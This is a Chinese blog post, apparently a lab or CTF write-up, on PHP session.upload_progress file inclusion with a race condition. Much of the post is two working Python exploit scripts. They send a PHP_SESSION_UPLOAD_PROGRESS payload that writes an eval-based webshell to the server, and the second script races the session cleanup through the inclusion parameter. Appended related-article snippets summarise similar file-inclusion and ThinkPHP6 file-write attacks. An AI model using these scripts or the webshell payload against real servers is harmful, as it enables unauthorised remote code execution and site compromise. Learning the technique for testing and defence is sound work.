文件包含(session条件竞争)

最新推荐文章于 2023-12-18 15:49:53 发布
最新推荐文章于 2023-12-18 15:49:53 发布
阅读量564 收藏 4
点赞数
文章标签: php 开发语言 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_64318364/article/details/128173933
版权

小白第一次接触(勿喷)

一.  利用场景

当存在一个文件包含漏洞但找不到可以包含恶意文件时候

二.利用条件

需要开启下面这些配置(默认开启)当我们向服务器上传文件时,php会把该文件保存session中

session.upload_progress.cleanup = On

当这个开启后,当我们上传文件后,会把文件给删掉,所以需要条件竞争,需要当我们在服务器删除之前读取文件

session.use_strict_mode = 0(默认是零),用户可以自定义sessionid(相当于可以控制php生成的文件名字,php生成文件名字一般为sess_sessionid),并将session信息写入这个文件中,(图中为文件保存路径)

三.关闭session.upload_progress.cleanup文件包含

当关闭之后,就不需要什么竞争,只需要上传文件就行,服务器并不会清掉。(首先要去php配置文件关闭)(注意把注释去掉)

 

之后写脚本上传文件

首先先看下代码

只有一个文件包含漏洞,没有什么危险文件,还有个phpinfo文件,访问

 

晓得路径。

 

 

刚开始什么都没有

 

成功写入,尝试包含并成功写入木马

 

四. 开启session.upload_progress.cleanup文件包含

当开启后,当文件上传后,服务器会删掉,需要竞争,python多线程解决,也可以burpsuite

开启后

成功上传

 

五.关闭session.upload_progress.cleanup文件包含 代码

import requests
# import io
# import threading

url = "http://192.168.229.132/include.php"
data = {'PHP_SESSION_UPLOAD_PROGRESS': "<?php $f = fopen('2.php','w');fwrite($f,'<?php $cmd = 123;eval($_POST[$cmd]);?>');?>"}
xiao = "xiao"
files = {"1.jpg": "12323131231"}
cookies = {'PHPSESSID': xiao}
session = requests.session()


def read():
    while True:
        session.post(url, data=data, files=files, cookies=cookies)


if __name__ == "__main__":
    read()

 六.开启session.upload_progress.cleanup文件包含 代码

import threading

import requests
# import io
# import threading

url = "http://192.168.229.132/include.php"
data = {'PHP_SESSION_UPLOAD_PROGRESS': "<?php $f = fopen('3.php','w');fwrite($f,'<?php $cmd = 123;eval($_POST[$cmd]);?>');?>"}
xiao = "xiao"
files = {"1.jpg": "12323131231"}
cookies = {'PHPSESSID': xiao}
session = requests.session()


def read():
    while True:
        session.post(url, data=data, files=files, cookies=cookies)


def write():
    while True:
        new_url = url + "?file=" + "../Extensions/tmp/tmp/sess_" + xiao
        r = session.get(new_url)
        if "upload_progress_" in r.text:
            print("上传成功")
            break


if __name__ == "__main__":
    t1 = threading.Thread(target=read)
    t2 = threading.Thread(target=write)
    t1.start()
    t2.start()

xoid
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
条件竞争
kid的博客
06-03 3912
条件竞争 前言 前面强网杯的时候做upload,有大佬提出过条件竞争的思路,虽然最后不是,但看了下条件竞争感觉还是很有意思的,这里来学习一下 下面是从别人博客中引用,我感觉是把条件竞争讲的挺清楚的,举的例子和大佬在比赛中分析的也很像 下面以相关操作逻辑顺序设计的不合理为例,具体讨论一下这类问题的成因。在很多系统中都会包含上传文件或者从远端获取文件保存在服务器的功能(如:允许用户使用网络上的图片...
文件上传-竞争条件
qq_25899635的博客
05-21 4364
文件上传过程介绍 文件上传过程 例如php的move_uploaded进行临时文件的重命名。 竞争条件原理介绍 网站逻辑: 1、网站允许上传任意文件,然后检查上传文件是否包含webshell,如果包含删除该文件。 2、网站允许上传任意文件,但是如果不是指定类型,那么使用unlink删除文件。 在删除之前访问上传的php文件,从而执行上传文件中的php代码。 例如:上传文件代码如下 <?ph...
thinkphp php6,ThinkPHP6 任意文件操作漏洞分析
weixin_33334733的博客
03-25 627
漏洞介绍2020年1月10日,ThinkPHP团队发布一个补丁更新,修复了一处由不安全SessionId导致的任意文件操作漏洞。该漏洞允许攻击者在目标环境启用session条件下创建任意文件以及删除任意文件,在特定情况下还可以getshell。具体受影响版本为ThinkPHP6.0.0-6.0.1。漏洞复现本地环境采用ThinkPHP 6.0.1+PHP7.1.20+Apache进行复现。在特...
Session文件包含漏洞
weixin_43803070的博客
06-06 3984
session文件包含漏洞 利用条件session的存储位置可以获取。 通过phpinfo的信息可以获取到session的存储位置。 通过phpinfo的信息,获取到session.save_path为/var/lib/php/session. 通过猜测默认的session存放位置进行尝试。 session中的内容可以被控制,传入恶意代码。 示例: <?php session_s...
查找sessionid 代码_代码审计之TP6任意文件操作漏洞
weixin_40000457的博客
12-10 286
沙漏安全团队欢迎真正热爱技术的你!本文首发于先知社区➡https://xz.aliyun.com/t/8409前言:审计代码能力太弱了,每次一看到审计代码的题目就不知道要如何进行,恰好做Web题的时候发现了一个有关ThinkPHP6.0漏洞的题目,趁这个机会也练习一下。0x00:漏洞介绍2020年1月10日,ThinkPHP团队发布一个补丁更新,修复了一处由不安全SessionId...
Session文件包含
一只web狗
06-23 3440
session文件包含介绍
文件包含Session文件包含
最新发布
weixin_52096670的博客
12-18 477
ctfs=ctfs 后,会在/var/lib/php/session目录下存储session的值。该选项不开启,我们可以自定义session_id,如,我们在请求数据包设置cookie为PHPSESSID=123,那么就会生成一个sess_123的session文件,此时php会自动初始化session,并产生一个键值,格式为配置文件中的session.upload_progress.prefix的值+我们上传的session.upload_progress.name的值此键值会写入session文件
文件包含漏洞学习
qq_48904485的博客
03-21 944
一、文件包含简介 开发人员都希望代码更加灵活,所以通常会将被包含的文件设置为变量,用来进行动态调用。正是这种灵活性,从而导致客户端可以调用一个恶意文件,造成文件包含漏洞。 1、文件包含函数 PHP文件包含函数有以下四种: require() require_once() include() include_once() include和require区别主要是,include在包含的过程中如果出现错误,会抛出一个警告,程序继续正常运行;而require函数出现错误的时候,会直接报错并退出程序的执行。 而
iwebsec 文件包含篇 (已完结)
qq_60829702的博客
03-30 1696
iwebsec 文件包含,详细分析,持续更新
competetogether:我们是一个开发人员团队,他们了解了现代社交媒体的局限性。 社交媒体仅限于与在线人建立联系。 我们创建此网站的目的是为朋友提供一种独特的方式,使其可以在线链接在一起,并激发我们的用户完成现实世界中的挑战以与朋友竞争
05-17
这些功能包括: 加入/创建组与其他小组成员聊天的能力子用例A 子用例B 添加任务供小组成员完成包括为每个任务分配值安装要安装,请克隆此存储库。 在存储库中,通过发出命令“ npm install”来安装所需的模块。 安装...
2019 IEEE International Conference on Edge Computing (EDGE).pdf
03-03
Edge 2019共收到30篇论文,包括27篇常规论文,3篇正在进行中的论文。 每篇论文均至少由3位PC成员审核,然后进行在线讨论。 最终决定由PC主席根据审查结果做出。 结果,有6篇论文被接受为常规论文,竞争激烈的接收率...
CTF Web各种题目的解题姿势
07-27
课时9:文件包含介绍 - 伪协议zip和phar利用17'56 课时10:文件包含介绍-伪协议phpfilter利用04'54 课时11:日志文件利用07'58 课时12:日志文件利用session会话利用17'43 第4章 SSRF 课时1:SSRF介绍与简单...
java 面试题 总结
09-16
EJB包括Session Bean、Entity Bean、Message Driven Bean,基于JNDI、RMI、JAT等技术实现。 SessionBean在J2EE应用程序中被用来完成一些服务器端的业务操作,例如访问数据库、调用其他EJB组件。EntityBean被用来...
CuteFTP9简易汉化版
04-11
一种上传软件的维持功能与竞争对手的不同之处在于,它提供了完全可定制的维持选项,包括时间开始发送命令,命令之间的随机时间间隔,可定制的命令列表,自动重拨选项。 多个Connections-Connect,浏览和导航多个站点同时...
ThinkPHP6.0.1_任意文件写入漏洞分析
11-29 786
ThinkPHP6.0.1_任意文件写入漏洞分析 ThinkPHP6.0.0-ThinkPHP6.0.1 漏洞代码<?php namespace app\controller; use app\BaseController; class Index extends BaseController{ public function index(){ $a = $_GET['a']; $b = $_GET['b']; session($a,$b);
【漏洞复现】ThinkPHP 小于 6.0.2 session id未作过滤漏洞导致的任意文件
m0_46344990的博客
04-20 1837
一、漏洞描述 ThinkPHP6.0.0到ThinkPHP6.0.1,由不安全SessionId导致的任意文件操作漏洞。该漏洞允许攻击者在目标环境启用session条件下创建任意文件以及删除任意文件,在特定情况下还可以getshell。 二、漏洞发现 首先我们下载好thinkphp6.0.0源码,网上搜一搜就出来了。将源码放在phpstudy的www目录下。注意需要运行环境php7.1+。先在/app/middleware.php中开启session。 然后在/app/controller/
php文件包含-条件竞争脚本
读万卷书,行万里路。
08-03 932
0 前言 这次将是最后一篇关于 php文件包含 利用的文章,这几篇文章的内容几乎可以满足绝大多数简单的文件包含题目,以后的文章会更偏向于原理分析、比赛真题、程序分析。 在前面几篇文章中,用了 CTFshow 的几道例题来讲解我使用 php支持的协议 来进行 php文件 的利用,而这篇文章则主要讲解条件竞争的 Python 脚本(比较懒,加上最近事情比较多,介绍条件竞争的博客已经非常多了)。 1 Payload import requests import threading # 攻击目标 HOST = "
session文件包含漏洞详解
永远是少年
12-14 1386
今天继续给大家介绍渗透测试相关知识,本文主要内容是session文件包含漏洞详解。 一、session文件包含简介 二、session文件包含实战
session文件包含
08-08
一个会话文件session file)是指在一个特定的会话中记录和保存对话内容的文件。它可以包含用户的输入、机器人的回复以及其他相关的对话信息。 会话文件通常以文本文件的形式存储,并且可以在需要的时候被加载和使用。通过使用会话文件,用户可以保存一个对话的状态,并在之后的时间点继续与机器人进行交互,而不会丢失之前的对话历史。 会话文件对于开发聊天机器人非常有用,因为它可以帮助机器人记住用户之前的问题、上下文和答案,从而提供更连贯、个性化的回复。此外,会话文件还可以用于调试和分析对话流程,以便更好地改进机器人的性能和用户体验。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值